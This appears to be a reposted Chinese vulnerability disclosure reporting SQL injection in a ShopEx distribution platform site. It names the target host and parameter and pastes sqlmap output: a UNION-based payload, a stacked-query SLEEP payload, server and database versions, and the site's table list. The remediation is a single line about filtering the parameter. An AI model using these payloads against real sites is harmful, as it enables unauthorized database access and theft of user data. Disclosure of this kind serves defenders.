ShopEx分销平台sql注入漏洞导致用户信息泄露 - 网

注入点：

http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET)

sqlmap identified the following injection points with a total of 184 HTTP(s) requests: --- Place: URI Parameter: #1* Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)-- --- web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL 5.0.11 web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL 5.0.11 Database: b2b_fenxiaowang [9 tables] +------------------+ | category | | data | | photo | | photo_extend | | product_active | | products | | products_content | | products_extend | | webnews | +------------------+

修复方案：

问题参数过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did15637

更新时间：2022-09-13 阅读：132次